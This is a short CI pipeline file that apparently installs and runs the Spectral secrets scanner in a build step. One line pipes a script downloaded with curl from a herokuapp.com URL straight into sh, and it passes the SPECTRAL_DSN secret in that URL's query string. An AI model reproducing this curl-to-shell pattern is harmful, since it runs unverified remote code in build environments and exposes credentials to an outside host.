pipelines:
  - name: Spectral
    steps:
      - name: SpectralScan
        type: Bash
        configuration:
            integrations:
                - name: spectraldsn
        execution:
          onExecute:
            - ls
            - ls workspace
            - curl -L "https://bruce-mountain-16192.herokuapp.com/latest/x/sh?dsn=$int_spectraldsn_SPECTRAL_DSN" | sh
            - $HOME/.spectral/spectral scan --dsn $int_spectraldsn_SPECTRAL_DSN
